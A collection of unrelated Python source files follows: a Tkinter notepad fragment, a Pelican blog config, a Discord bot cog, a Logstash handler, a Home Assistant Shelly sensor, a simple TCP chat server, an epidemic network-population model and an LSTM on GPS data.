press.........# root.bind_all("<Control-x>",cut) editmenu.add_separator() editmenu.add_command(label="Select All",command=selectall,accelerator="Ctrl+A") root.bind_all("<Control-A>",selectall) #..........binds function with key press.........# root.bind_all("<Control-a>",selectall) editmenu.add_command(label="Find",command=find,accelerator="Ctrl+F") root.bind_all("<Control-F>",find) #..........binds function with key press.........# root.bind_all("<Control-f>",find) menubar.add_cascade(label="Edit",menu=editmenu) #.....................help menu......................# helpmenu=Menu(menubar,tearoff=0) helpmenu.add_command(label="Help",command=help) helpmenu.add_command(label="About",command=about) menubar.add_cascade(label="Help",menu=helpmenu) root.config(menu=menubar) root.mainloop() #..........................starts root.................#
python
#!/usr/bin/env python # -*- encoding: utf-8 -*- """ Topic: 读写文本文件 Desc : """ def rw_text(): # Iterate over the lines of the file with open('somefile.txt', 'rt') as f: for line in f: # process line print(line) # Write chunks of text data with open('somefile.txt', 'wt') as f: f.write('text1') f.write('text2') if __name__ == '__main__': rw_text()
python
#!/usr/bin/env python # -*- coding: utf-8 -*- # from __future__ import unicode_literals AUTHOR = u'Eevee' SITENAME = u'fuzzy notepad' SITEURL = '' #SITESUBTITLE = ... TIMEZONE = 'America/Los_Angeles' DEFAULT_LANG = u'en' # Feed generation is usually not desired when developing FEED_ATOM = None FEED_ALL_ATOM = None CATEGORY_FEED_ATOM = None TRANSLATION_FEED_ATOM = None # Blogroll # TODO lol these don't exist in my theme and i'm not sure whether i care?? LINKS = (('Pelican', 'http://getpelican.com/'), ('Python.org', 'http://python.org/'), ('Jinja2', 'http://jinja.pocoo.org/'), ('You can modify those links in your config file', '#'),) # Social cruft # TODO theme doesn't support this, but i'd kinda like it for the main page SOCIAL = (('You can add links in your config file', '#'), ('Another social link', '#'),) TWITTER_USERNAME = 'eevee' GITHUB_URL = 'https://github.com/eevee' DEFAULT_PAGINATION = 17 DEFAULT_ORPHANS = 4 PAGINATION_PATTERNS = ( (1, '{base_name}/', '{base_name}/index.html'), (2, '{base_name}/page/{number}/', '{base_name}/page/{number}/index.html'), ) THEME = 'theme' EXTRA_HEADER = """ <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.0/jquery.min.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/jquery.colorbox/1.4.33/jquery.colorbox-min.js"></script> <script type="text/javascript"> $(function() { $('article').each(function(index, article) { console.log(index, article); $(article).find('a.photo').colorbox({ fixed: true, maxWidth: '100%', maxHeight: '100%', rel: 'colorbox' + String(index + 1) }); }); }); </script> """ # Smart quotes and other things TYPOGRIFY = True MD_EXTENSIONS = [ 'codehilite(css_class=highlight,linenums=True)', 'extra', # GitHub-style fenced code blocks 'fenced_code', # I don't actually care about a table of contents, but this turns headers # into self-links 'toc(anchorlink=True)', ] PATH = 'content/' PAGE_DIR = '../pages/' STATIC_PATHS = ['favicon.png', 'media'] # URL schema; compatible with Octopress, but i happen to like it anyway ARCHIVES_URL = 'blog/archives/' # doesn't officially exist but whatever ARCHIVES_SAVE_AS = 'blog/archives/index.html' ARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/' ARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html' AUTHOR_SAVE_AS = False AUTHORS_SAVE_AS = False CATEGORIES_URL = 'blog/categories/' CATEGORIES_SAVE_AS = 'blog/categories/index.html' CATEGORY_URL = 'blog/categories/{slug}/' CATEGORY_SAVE_AS = 'blog/categories/{slug}/index.html' PAGE_URL = '{slug}/' PAGE_SAVE_AS = '{slug}/index.html' TAG_URL = 'blog/tags/{slug}/' TAG_SAVE_AS = 'blog/tags/{slug}/index.html' TAGS_URL = 'blog/tags/' TAGS_SAVE_AS = 'blog/tags/index.html' # Octopress-compatible filename metadata parsing FILENAME_METADATA = '(?P<date>\d{4}-\d{2}-\d{2})-(?P<slug>.*)' # Uncomment following line if you want document-relative URLs when developing #RELATIVE_URLS = True ### Plugins # Some minor hackery to have multiple PLUGIN_PATHs, since I want both canonical # plugins and one of my own... import os.path import sys sys.path.insert(0, os.path.dirname(__file__)) import eeveeblog.liquid_photo PLUGIN_PATH = "pelican-plugins.git" PLUGINS = [ eeveeblog.liquid_photo, 'summary' ] # Plugin config for summary SUMMARY_BEGIN_MARKER = '<!-- just kidding i never use this -->' SUMMARY_END_MARKER = '<!-- more -->' # octopress compat # This is actually a stock setting; I don't want an automatic summary if I # don't use an explicit marker SUMMARY_MAX_LENGTH = None
python
""" Commands for fun """ from discord.ext import commands class FunCommands(commands.Cog, name='Fun'): def __init__(self, bot): print('Loading FunCommands module...', end='') self.bot = bot print(' Done') @commands.command(help='You spin me right round, baby, right round') async def spin(self, ctx): await ctx.send('https://www.youtube.com/watch?v=PGNiXGX2nLU') @commands.command(aliases=['XcQ'], help='A very interesting video you should consider watching') async def rickroll(self, ctx): await ctx.send('<https://www.youtube.com/watch?v=dQw4w9WgXcQ>') await ctx.send('<:kappa_jtcf:546748910765604875>') @commands.command() async def ping(self, ctx): pong = await ctx.send('pong!') time_diff = pong.created_at - ctx.message.created_at await pong.edit(content='pong!\nTime delta is {0} ms'.format(time_diff.microseconds/1000)) @commands.command(hidden=True, aliases=['UDOD_COMMUNIST', 'UDOD', 'udod', 'УДОД_КОММУНИСТ', 'Удод_Коммунист', 'УДОД', 'Удод', 'удод']) async def udod_communist(self, ctx): await ctx.send('https://www.youtube.com/watch?v=YHR5_IvC8Gw') @commands.command(hidden=True, aliases=['UDOD_COMMUNIST_2', 'UDOD2', 'udod2', 'УДОД_КОММУНИСТ_2', 'Удод_Коммунист_2', 'УДОД2', 'Удод2', 'удод2']) async def udod_communist2(self, ctx): await ctx.send('https://youtu.be/BgF5HcnNN-Q') def setup(bot): bot.add_cog(FunCommands(bot))
python
from logging.handlers import DatagramHandler, SocketHandler from logstash import formatter # Derive from object to force a new-style class and thus allow super() to work # on Python 2.6 class TCPLogstashHandler(SocketHandler, object): """Python logging handler for Logstash. Sends events over TCP. :param host: The host of the logstash server. :param port: The port of the logstash server (default 5959). :param message_type: The type of the message (default logstash). :param fqdn; Indicates whether to show fully qualified domain name or not (default False). :param tags: list of tags for a logger (default is None). :param limit_stacktrace: limit characters for stacktraces :param limit_string_fields: limit characters for string fields :param limit_containers: limit length of containers (dict, list, set) """ def __init__(self, host, port=5959, message_type='logstash', tags=None, fqdn=False, limit_stacktrace=0, limit_string_fields=0, limit_containers=0): super(TCPLogstashHandler, self).__init__(host, port) self.formatter = formatter.LogstashFormatter(message_type, tags, fqdn, limit_stacktrace=limit_stacktrace, limit_string_fields=limit_string_fields, limit_containers=limit_containers) def makePickle(self, record): return self.formatter.format(record) + b'\n'
python
""" Get Shelly Cloud information for a given host through web api. For more details about this platform, please refer to the documentation at https://github.com/marcogazzola/custom_components/blob/master/README.md """ import logging from homeassistant.helpers.entity import (Entity) from .const import ( REQUIREMENTS_LIST, CONF_DEVICES, DOMAIN as SHELLY_DOMAIN, CONST_SENSOR_ROLLER, CONST_SENSOR_RELAY, SENSOR_ICONS, CONST_SENSOR_SYSTEM, CONST_SENSOR_MQTT, CONST_SENSOR_CLOUD, CONST_SENSOR_WIFI, CONST_UPTODATE, CONST_UPDATEAVAILABLE, CONST_SENSOR_FIRMWARE, CONST_DISCONNECTED, CONST_CONNECTED) REQUIREMENTS = [REQUIREMENTS_LIST] _LOGGER = logging.getLogger(__name__) def setup_platform( hass, config, add_entities, discovery_info=None): """Add the Shelly Cloud Sensor entities""" from shellypython.const import (WORKING_MODE_RELAY, WORKING_MODE_ROLLER) for ip_address, shelly_data in ( hass.data[SHELLY_DOMAIN][CONF_DEVICES].items()): if ip_address not in hass.data[SHELLY_DOMAIN]['sensor']: if shelly_data is not None and shelly_data.data is not None: if shelly_data.data.working_mode_raw == WORKING_MODE_RELAY: if CONST_SENSOR_ROLLER in shelly_data.monitored_conditions: shelly_data.monitored_conditions.remove( CONST_SENSOR_ROLLER) elif shelly_data.data.working_mode_raw == WORKING_MODE_ROLLER: if CONST_SENSOR_RELAY in shelly_data.monitored_conditions: shelly_data.monitored_conditions.remove( CONST_SENSOR_RELAY) sensors = [] for variable in shelly_data.monitored_conditions: sensors.append( ShellySensor(shelly_data, variable, shelly_data.name)) hass.data[SHELLY_DOMAIN]['sensor'].append(ip_address) add_entities(sensors, True) class ShellySensor(Entity): """Implementation of Shelly sensor.""" def __init__(self, shelly_data, sensor_type, name): """Initialize the sensor.""" self.client_name = name self._name = sensor_type self.shelly_data = shelly_data self.type = sensor_type self._state = None self._unit_of_measurement = None self._attributes = None @property def name(self): """Return the name of the sensor.""" return '{} {}'.format(self.client_name, self._name) @property def unit_of_measurement(self): """Return the unit of measurement of this entity, if any.""" return self._unit_of_measurement @property def icon(self): """Return the icon to represent this sensor.""" if self.type in SENSOR_ICONS: return SENSOR_ICONS[self.type] return SENSOR_ICONS[CONST_SENSOR_SYSTEM] @property def state(self): """Return the expiration days for hostname.""" return self._state @property def device_state_attributes(self): """Get the more info attributes.""" return self._attributes def _empty_state_and_attributes(self): """Empty the state and attributes on an error.""" from shellypython.const import (DEVICE_NOT_READY) self._state = DEVICE_NOT_READY self._attributes = None def update(self): """Get the current Shelly status.""" # self.shelly_data.update() if self.shelly_data is None or self.shelly_data.data is None: self._empty_state_and_attributes() return if self.type == CONST_SENSOR_SYSTEM: self._state = self.shelly_data.data.main_status attributes_data = ( self.shelly_data.data.system.as_dict() if self.shelly_data.data.system is not None else None ) attributes_data.update({'model': self.shelly_data.data.model}) attributes_data.update( {'working_mode': self.shelly_data.data.working_mode} ) attributes_data.update( {'host_name': self.shelly_data.data.host_name} ) self._attributes = attributes_data elif self.type == CONST_SENSOR_MQTT: attributes_data = ( self.shelly_data.data.mqtt if self.shelly_data.data.mqtt is not None else None) if attributes_data is None or not attributes_data.connected: self._state = CONST_DISCONNECTED else: self._state = CONST_CONNECTED self._attributes = None elif self.type == CONST_SENSOR_CLOUD: attributes_data = ( self.shelly_data.data.cloud if self.shelly_data.data.cloud is not None else None) if attributes_data is None or not attributes_data.connected: self._state = CONST_DISCONNECTED else: self._state = CONST_CONNECTED self._attributes = None elif self.type == CONST_SENSOR_WIFI: attributes_data = ( self.shelly_data.data.wifi_sta if self.shelly_data.data.wifi_sta is not None else None) if attributes_data is None or not attributes_data.connected: self._state = CONST_DISCONNECTED self._attributes = None else: self._state = "{} %".format(attributes_data.quality) self._attributes = { "Ssid": attributes_data.ssid, "Ip": attributes_data.ip, "Rssi": attributes_data.rssi, } elif self.type == CONST_SENSOR_FIRMWARE: attributes_data = ( self.shelly_data.data.firmware if self.shelly_data.data.firmware is not None else None) if attributes_data is None or not attributes_data.has_update: self._state = CONST_UPTODATE self._attributes = ( {"Current version": attributes_data.old_version} ) else: self._state = CONST_UPDATEAVAILABLE self._attributes = { "Current version": attributes_data.old_version, "Latest version": attributes_data.new_version, } elif self.type == CONST_SENSOR_FIRMWARE: attributes_data = ( self.shelly_data.data.firmware if self.shelly_data.data.firmware is not None else None) if attributes_data is None or not attributes_data.has_update: self._state = CONST_UPTODATE self._attributes = ( {"Current version": attributes_data.old_version} ) else: self._state = CONST_UPDATEAVAILABLE self._attributes = { "Current version": attributes_data.old_version, "Latest version": attributes_data.new_version, }
python
from socket import * from select import * HOST = '' PORT = 10001 BUFSIZE = 1024 ADDR = (HOST, PORT) #소켓 생성 serverSocket = socket(AF_INET, SOCK_STREAM) #소켓 주소 serverSocket.bind(ADDR) #연결 수신 serverSocket.listen(1) #연결 수락 clientSocekt, addr_info = serverSocket.accept() print(clientSocekt) while True: data = clientSocekt.recv(65535) if not data : break # 받은 data가 없을시에 통신종료 print(data.decode()) # 받은 data출력 line = input() clientSocekt.sendall(line.encode()) # 문자 전송 clientSocekt.close()
python
# -*- coding: utf-8 -*- """ Name: population.py Authors: Christian Haack, Stephan Meighen-Berger, Andrea Turcati Constructs the population. """ from typing import Union, Tuple import random import numpy as np # type: ignore import logging import networkx as nx # type: ignore import scipy.stats from networkx.utils import py_random_state from networkx.generators.community import _zipf_rv_below from ..config import config from ..pdfs import construct_pdf from .population_base import Population _log = logging.getLogger(__name__) def intra_com_cons(g, u): c = g.nodes[u]["community"] adj_in_com = 0 for adj in g[u]: if adj in c: adj_in_com += 1 return adj_in_com def suboptimal(g, u, target_intra): adj_in_com = intra_com_cons(g, u) return (adj_in_com < target_intra) and target_intra > 0 def supoptimal(g, u, target_intra): adj_in_com = intra_com_cons(g, u) return adj_in_com > target_intra @py_random_state(6) def _powerlaw_sequence(gamma, low, high, condition, length, max_iters, seed): """Returns a list of numbers obeying a constrained power law distribution. ``gamma`` and ``low`` are the parameters for the Zipf distribution. ``high`` is the maximum allowed value for values draw from the Zipf distribution. For more information, see :func:`_zipf_rv_below`. ``condition`` and ``length`` are Boolean-valued functions on lists. While generating the list, random values are drawn and appended to the list until ``length`` is satisfied by the created list. Once ``condition`` is satisfied, the sequence generated in this way is returned. ``max_iters`` indicates the number of times to generate a list satisfying ``length``. If the number of iterations exceeds this value, :exc:`~networkx.exception.ExceededMaxIterations` is raised. seed : integer, random_state, or None (default) Indicator of random number generation state. See :ref:`Randomness<randomness>`. """ for i in range(max_iters): seq = [] while not length(seq): seq.append(_zipf_rv_below(gamma, low, high, seed)) if condition(seq): return seq raise nx.ExceededMaxIterations("Could not create power law sequence") @py_random_state(4) def _generate_communities(degree_seq, community_sizes, mu, max_iters, seed): """Returns a list of sets, each of which represents a community. ``degree_seq`` is the degree sequence that must be met by the graph. ``community_sizes`` is the community size distribution that must be met by the generated list of sets. ``mu`` is a float in the interval [0, 1] indicating the fraction of intra-community edges incident to each node. ``max_iters`` is the number of times to try to add a node to a community. This must be greater than the length of ``degree_seq``, otherwise this function will always fail. If the number of iterations exceeds this value, :exc:`~networkx.exception.ExceededMaxIterations` is raised. seed : integer, random_state, or None (default) Indicator of random number generation state. See :ref:`Randomness<randomness>`. The communities returned by this are sets of integers in the set {0, ..., *n* - 1}, where *n* is the length of ``degree_seq``. """ # This assumes the nodes in the graph will be natural numbers. result = [set() for _ in community_sizes] n = len(degree_seq) free = list(range(n)) com_indices = range(len(community_sizes)) for i in range(max_iters): v = free.pop() c = seed.choice(com_indices) # s = int(degree_seq[v] * (1 - mu) + 0.5) s = round(degree_seq[v] * (1 - mu)) # If the community is large enough, add the node to the chosen # community. Otherwise, return it to the list of unaffiliated # nodes. if s < community_sizes[c]: result[c].add(v) else: free.append(v) # If the community is too big, remove a node from it. if len(result[c]) > community_sizes[c]: rnd_node = seed.choice(tuple(result[c])) free.append(rnd_node) result[c].remove(rnd_node) if not free: return result msg = "Could not assign communities; try increasing min_community" raise nx.ExceededMaxIterations(msg) class NetworkXWrappers(object): @staticmethod def add_lfr_weights(g): g.remove_edges_from(nx.selfloop_edges(g)) edge_weights = {} inter_actions_rvs = construct_pdf( config["population"]["nx"]["inter freq pdf"] ).rvs intra_actions_rvs = construct_pdf( config["population"]["nx"]["intra freq pdf"] ).rvs inter_actions = inter_actions_rvs(len(g)) intra_actions = intra_actions_rvs(len(g)) for edge in g.edges: if edge[0] in g.nodes[edge[1]]["community"]: intra_rate_0 = intra_actions[edge[0]] / g.degree[edge[0]] intra_rate_1 = intra_actions[edge[1]] / g.degree[edge[1]] avg_int = 0.5 * (intra_rate_0 + intra_rate_1) # mu is the fraction of inter-community interacions edge_weights[edge] = avg_int else: inter_rate_0 = inter_actions[edge[0]] / g.degree[edge[0]] inter_rate_1 = inter_actions[edge[1]] / g.degree[edge[1]] avg_int = 0.5 * (inter_rate_0 + inter_rate_1) edge_weights[edge] = avg_int nx.set_edge_attributes(g, edge_weights, "weight") return g @staticmethod def lfr_benchmark(pop_size, **kwargs): kwargs["seed"] = config["runtime"]["random state"] g = nx.generators.community.LFR_benchmark_graph(pop_size, **kwargs) g = NetworkXWrappers.add_lfr_weights(g) return g @staticmethod def lfr_ba(pop_size, **kwargs): seed = config["general"]["random state seed"] random.seed(seed) state = config["runtime"]["random state"] kwargs["seed"] = seed mu = kwargs["mu"] g = nx.barabasi_albert_graph(pop_size, kwargs["m"], seed=seed) deg_seq = list(dict(nx.degree(g)).values()) min_community = kwargs.get("min_community", None) max_community = kwargs.get("max_community", None) n = pop_size # Validate parameters for generating the community size sequence. if min_community is None: min_community = min(deg_seq) + 1 else: if min_community < min(deg_seq) + 1: print("Min community is smaller than min(k)+1. Adjusting") min_community = min(deg_seq) + 1 if max_community is None: max_community = 3*max(deg_seq) else: if max_community < max(deg_seq) + 1: print("Max community is smaller than max(k)+1. Adjusting") max_community = int(2 * (max(deg_seq))) low, high = min_community, max_community def condition(seq): return sum(seq) == n def length(seq): return sum(seq) >= n comms = _powerlaw_sequence( kwargs["tau"], low, high, condition, length, kwargs["max_iters"], seed, ) communities = _generate_communities(deg_seq, comms, mu, 50 * n, seed) g.remove_edges_from(nx.selfloop_edges(g)) for c in communities: for u in c: g.nodes[u]["community"] = c node_degrees = np.asarray(list(dict(g.degree).values())) num_inter_con = state.binomial(node_degrees, mu) num_intra_con = node_degrees - num_inter_con # print("Target mu: ", np.sum(num_inter_con) / np.sum(node_degrees)) max_it = 75 it = -1 last_mu = 0 no_change_for = 0 while True: it += 1 """ if it % 5 == 4: num_inter_con = state.binomial(node_degrees, mu) num_intra_con = node_degrees - num_inter_con """ intra_cnt = np.sum( [v in g.nodes[u]["community"] for u, v in g.edges] ) cur_mu = 1 - intra_cnt / g.number_of_edges() if ( np.abs(cur_mu / mu - 1) < kwargs["tolerance"] * mu or cur_mu < mu ): break if cur_mu == last_mu: no_change_for += 1 if no_change_for == 5: print( "No change for five steps. Current mu: ", cur_mu, " Target: ", mu, ) break else: no_change_for = 0 last_mu = cur_mu if it > max_it: print( "Max iterations reached. Current mu: ", cur_mu, " Target: ", mu, ) break # First find all sub- and sup-optimal nodes all_sub_optimal_nodes = set() all_sup_optimal_nodes = set() for u, n_inter_con, n_intra_con in zip( g, num_inter_con, num_intra_con ): c = g.nodes[u]["community"] if supoptimal(g, u, n_intra_con): all_sup_optimal_nodes.add(u) elif suboptimal(g, u, n_intra_con): all_sub_optimal_nodes.add(u) assert len(all_sup_optimal_nodes & all_sub_optimal_nodes) == 0 for u, n_inter_con, n_intra_con in zip( g, num_inter_con, num_intra_con ): if node_degrees[u] < 2: continue c = g.nodes[u]["community"] if ( u not in all_sub_optimal_nodes and u not in all_sup_optimal_nodes ): continue sub_optimal_nodes = all_sub_optimal_nodes & c sup_optimal_nodes = all_sup_optimal_nodes & c not_optimal_nodes = sub_optimal_nodes | sup_optimal_nodes attempted_vs = set() if u in sub_optimal_nodes: sub_optimal_nodes.remove(u) not_optimal_nodes.remove(u) all_sub_optimal_nodes.remove(u) while True: if len(not_optimal_nodes) < 1: break if not suboptimal(g, u, n_intra_con): break candidates = tuple(not_optimal_nodes - attempted_vs) if not candidates: break if kwargs["pref_attach"]: v = random.choices( candidates, weights=node_degrees[list(candidates)], )[0] else: v = random.choice(candidates) attempted_vs.add(v) if v in sup_optimal_nodes: # Strategy: # -Rewire an internal connection from v to u # -Rewire an external connection from u to v # Get external adjacent node of u target_1 = None shuffled_adj = list(g[u]) random.shuffle(shuffled_adj) for adj in shuffled_adj: if ( adj not in c and adj not in g[v] and adj != v ): target_1 = adj break if target_1 is None: continue # Get internal adjacent node of v target_2 = None for adj in g[v]: if adj in c and adj not in g[u] and adj != u: target_2 = adj break if target_2 is None: continue g.remove_edge(u, target_1) g.remove_edge(v, target_2) g.add_edge(u, target_2) g.add_edge(v, target_1) if not supoptimal(g, v, num_intra_con[v]): sup_optimal_nodes.remove(v) all_sup_optimal_nodes.remove(v) not_optimal_nodes.remove(v) else: # Strategy: # -Rewire an external connection from v to u # -Rewire an external connection from u to v # -Connect the two external nodes # Pick a sub-optimal node from community # v = random.choices( # tuple(sub_optimal_nodes), # weights=[g.degree[node] # for node in sub_optimal_nodes])[0] if v in g[u]: continue # From edges of u shuffled_adj = list(g[u]) random.shuffle(shuffled_adj) target_1 = None for adj in shuffled_adj: if adj not in c: target_1 = adj break if target_1 is None: break target_2 = None for adj in g[v]: if ( adj not in c # and adj in all_sup_optimal_nodes and adj != target_1 and target_2 not in g.nodes[target_1]["community"] and target_2 not in g[target_1] ): target_2 = adj break if target_2 is None: break g.add_edge(u, v) g.remove_edge(u, target_1) g.remove_edge(v, target_2) g.add_edge(target_1, target_2) if not suboptimal(g, v, num_intra_con[v]): sub_optimal_nodes.remove(v) all_sub_optimal_nodes.remove(v) not_optimal_nodes.remove(v) if suboptimal(g, u, num_intra_con[u]): sub_optimal_nodes.add(u) all_sub_optimal_nodes.add(u) not_optimal_nodes.add(u) # TODO: check targets? else: sup_optimal_nodes.remove(u) all_sup_optimal_nodes.remove(u) not_optimal_nodes.remove(u) while True: if len(sub_optimal_nodes) < 1: break if not supoptimal(g, u, n_intra_con): break candidates = tuple(sub_optimal_nodes - attempted_vs) if not candidates: break if kwargs["pref_attach"]: v = random.choices( candidates, weights=node_degrees[list(candidates)], )[0] else: v = random.choice(candidates) attempted_vs.add(v) """ v = random.choices( tuple(sub_optimal_nodes), weights=[g.degree[node] for node in sub_optimal_nodes])[0] """ # Pick adjacent internal node # u - target1 target_1 = None shuffled_adj = list(g[u]) random.shuffle(shuffled_adj) for adj in shuffled_adj: if adj in c and adj not in g[v] and adj != v: target_1 = adj break if target_1 is None: # No luck this turn break target_2 = None # Choose an inter-community edge from v # v - target_2 for adj in g[v]: if adj not in c and adj not in g[u]: target_2 = adj break if target_2 is None: break g.remove_edge(u, target_1) # u-1i, target1-1i g.remove_edge(v, target_2) # v-1e, target2-1e g.add_edge(u, target_2) # u+1e, target2+1e g.add_edge(v, target_1) # v+1i, target1+1i if not suboptimal(g, v, num_intra_con[v]): sub_optimal_nodes.remove(v) all_sub_optimal_nodes.remove(v) not_optimal_nodes.remove(v) if not supoptimal(g, u, num_intra_con[u]): sup_optimal_nodes.add(u) all_sup_optimal_nodes.add(u) not_optimal_nodes.add(u) g = NetworkXWrappers.add_lfr_weights(g) nx.set_node_attributes( g, kwargs["symp_prob"], "symp_prob") return g @staticmethod def hierarchical_lfr_ba(pop_size, **kwargs): seed = config["general"]["random state seed"] n = pop_size random.seed(seed) def condition(seq): return sum(seq) == n def length(seq): return sum(seq) >= n graph_sizes = _powerlaw_sequence( kwargs["tau_graphs"], kwargs["min_graph"], kwargs["max_graph"], condition, length, kwargs["max_iters"], seed, ) cur_size = 0 combined = nx.Graph() for hier_com, gs in enumerate(graph_sizes): g = NetworkXWrappers.lfr_ba(gs, **kwargs) mapping = {i: i+cur_size for i in range(gs)} nx.relabel_nodes(g, mapping, copy=False) for node in g: g.nodes[node]["hier_comm"] = hier_com comm = g.nodes[node]["community"] relabeled_comm = set() for val in list(comm): relabeled_comm.add(val+cur_size) combined.add_nodes_from(g.nodes(data=True)) combined.add_edges_from(g.edges) cur_size += gs for u in combined: this_hcomm = combined.nodes[u]["hier_comm"] adjs = combined[u] for adj in list(adjs): if (adj not in combined.nodes[u]["community"] and random.uniform(0, 1) < kwargs["mu_hier"]/2): while True: randint = random.randint(0, pop_size-1) v = combined.nodes[randint] if randint == u: continue if randint in combined.nodes[u]["community"]: continue if v["hier_comm"] == this_hcomm: continue partner = None for adj2 in list(combined[randint]): if (adj2 not in v["community"] and adj2 not in combined.nodes[u]["community"]): partner = adj2 break if partner is not None: break combined.remove_edge(u, adj) combined.remove_edge(randint, partner) combined.add_edge(u, randint) combined.add_edge(adj, partner) combined = NetworkXWrappers.add_lfr_weights(combined) nx.set_node_attributes( g, kwargs["school_symp_prob"], "symp_prob") return combined @staticmethod def relaxed_caveman_graph(pop_size, **kwargs): clique_size = kwargs["clique_size"] n_cliques = pop_size // clique_size p = kwargs["p"] g = nx.relaxed_caveman_graph(n_cliques, clique_size, p) g.remove_edges_from(nx.selfloop_edges(g)) if kwargs["pruning_frac"] > 0: rem_edges = random.sample( g.edges, k=int(kwargs["pruning_frac"] * len(g.edges)) ) g.remove_edges_from(rem_edges) return g @staticmethod def schools_model(pop_size, **kwargs): rstate = config["runtime"]["random state"] school_graph = NetworkXWrappers.relaxed_caveman_graph( pop_size, **kwargs ) nx.set_node_attributes( school_graph, kwargs["school_symp_prob"], "symp_prob") # add families family_sizes = scipy.stats.nbinom.rvs( 8, 0.9, size=len(school_graph), random_state=rstate) + 1 cur_size = len(school_graph) combined = nx.Graph() combined.add_nodes_from(school_graph.nodes(data=True)) combined.add_edges_from(school_graph.edges) for node, fam_size in zip(school_graph.nodes, family_sizes): combined.nodes[node]["type"] = "school" combined.nodes[node]["random_testable"] = True combined.nodes[node]["family_index"] = node f_graph = nx.generators.complete_graph(fam_size) nx.set_node_attributes( f_graph, kwargs["family_symp_prob"], "symp_prob") mapping = {i: i+cur_size for i in range(fam_size)} nx.relabel_nodes(f_graph, mapping, copy=False) for v in f_graph.nodes: f_graph.nodes[v]["type"] = "family" f_graph.nodes[v]["family_index"] = node f_graph.nodes[v]["random_testable"] = False combined.add_nodes_from(f_graph.nodes(data=True)) for v in f_graph.nodes: combined.add_edge(node, v) combined.add_edges_from(f_graph.edges) cur_size += fam_size combined.graph["n_school"] = len(school_graph) return combined class NetworkXPopulation(Population): def __init__(self, interaction_rate_scaling=1, *args, **kwargs): super().__init__( interaction_rate_scaling=interaction_rate_scaling, *args, **kwargs ) self._random_interact_pdf = construct_pdf( config["population"]["random interactions pdf"] ) self._random_interact_intensity_pdf = construct_pdf( config["population"]["random interactions intensity pdf"] ) gen_func = getattr( NetworkXWrappers, config["population"]["nx"]["func"] ) self._graph = gen_func( self._pop_size, **(config["population"]["nx"]["kwargs"]) ) for node in self._graph: self._graph.nodes[node]["history"] = {} def get_contacts( self, rows: np.ndarray, cols: np.ndarray, return_rows=False ) -> Union[ Tuple[np.ndarray, np.ndarray], Tuple[np.ndarray, np.ndarray, np.ndarray], ]: contact_cols = [] contact_rows = [] n_rnd_contacts = np.asarray( np.round(self._random_interact_pdf.rvs(rows.shape[0])), dtype=np.int, ) rnd_indices_all = np.split( self._rstate.randint( 0, len(rows), size=np.sum(n_rnd_contacts), dtype=np.int ), np.cumsum(n_rnd_contacts), )[:-1] rnd_ctc_intens_all = np.split( self._random_interact_intensity_pdf.rvs(np.sum(n_rnd_contacts)), np.cumsum(n_rnd_contacts), )[:-1] col_set = set(cols) for row, n_rnd_contact, rnd_indices, rnd_ctc_intens in zip( rows, n_rnd_contacts, rnd_indices_all, rnd_ctc_intens_all): sel_cols = [] sel_rows = [] adj = self._graph[row] for ctc_ind, node_attrs in adj.items(): if ctc_ind not in col_set: continue sel_cols.append(ctc_ind) sel_rows.append(row) for rnd_ind, intens in zip(rnd_indices, rnd_ctc_intens): if rnd_ind not in col_set: continue if rnd_ind not in adj: sel_cols.append(rnd_ind) sel_rows.append(row) contact_cols.append(np.array(sel_cols, dtype=int)) contact_rows.append(np.array(sel_rows, dtype=int)) if contact_cols: contact_cols = np.concatenate(contact_cols) contact_rows = np.concatenate(contact_rows) unique_indices, ind, counts = np.unique( contact_cols, return_index=True, return_counts=True ) contact_cols = unique_indices # contact_rates = contact_rates[ind] * counts contact_rows = contact_rows[ind] contact_strengths = np.ones_like(unique_indices) * counts else: contact_cols = np.empty(0, dtype=int) contact_rows = np.empty(0, dtype=int) contact_strengths = np.empty(0, dtype=int) if return_rows: return contact_cols, contact_strengths, contact_rows else: return contact_cols, contact_strengths
python
import numpy as np import matplotlib.pyplot as plt import pandas as pd from tensorflow.keras import Sequential from tensorflow.keras.layers import Dense, LSTM, Dropout from sklearn.preprocessing import MinMaxScaler dataset = pd.read_csv('../Dataset/GPS Database Cleaned Data-One Day.csv', parse_dates=True, index_col='date_time') # for set all decimal points to 4 dataset = np.array(dataset) len = dataset.shape[0] for row in range(len): dataset[row, 8] = round(dataset[row, 8], 5) dataset[row, 9] = round(dataset[row, 9], 5) dataset[row, 10] = round(dataset[row, 10], 5) # categorical data encoding from sklearn.preprocessing import OneHotEncoder from sklearn.compose import ColumnTransformer transformer = ColumnTransformer( transformers=[ ("OneHotEncoder", # Just a name OneHotEncoder(), # The transformer class [0] # The column(s) to be applied on. ) ], remainder='passthrough' ) dataset = transformer.fit_transform(dataset) # Avoiding Dummy Variable Trap # dataset = dataset[:, 1:] transformer = ColumnTransformer( transformers=[ ("OneHotEncoder", # Just a name OneHotEncoder(), # The transformer class [1] # The column(s) to be applied on. ) ], remainder='passthrough' ) dataset = transformer.fit_transform(dataset) # Avoiding Dummy Variable Trap # dataset = dataset[:, 1:] transformer = ColumnTransformer( transformers=[ ("OneHotEncoder", # Just a name OneHotEncoder(), # The transformer class [2] # The column(s) to be applied on. ) ], remainder='passthrough' ) dataset = transformer.fit_transform(dataset) dataset=dataset.astype('float32') # Avoiding Dummy Variable Trap # dataset = dataset[:, 1:] # Feature Scaling from sklearn.preprocessing import StandardScaler # scaler = MinMaxScaler(feature_range=(0, 2)) # scaler = StandardScaler() # dataset = scaler.fit_transform(dataset) # spliting the dataset into test data and training data from sklearn.model_selection import train_test_split training_set, test_set = train_test_split(dataset, test_size=0.1) # Prepare Training Data X_train, y_train = [], [] for i in range(6, training_set.shape[0] - 7): X_train.append(training_set[i - 6:i]) y_train.append(training_set[i+1, 8]) X_train = np.array(X_train) y_train = np.array(y_train) # X_train = np.reshape(X_train.shape[0], X_train.shape[1], 1) # y_train = np.reshape(y_train.shape[0], y_train.shape[1], 1) # Build LSTM regressor = Sequential() regressor.add(LSTM(units=100, activation='relu', input_shape=(X_train.shape[1], 11), return_sequences=True)) regressor.add(Dropout(0.2)) regressor.add(LSTM(units=170, activation='relu', return_sequences=True)) regressor.add(Dropout(0.3)) regressor.add(LSTM(units=190, activation='relu', return_sequences=True)) regressor.add(Dropout(0.4)) regressor.add(LSTM(units=250, activation='relu')) 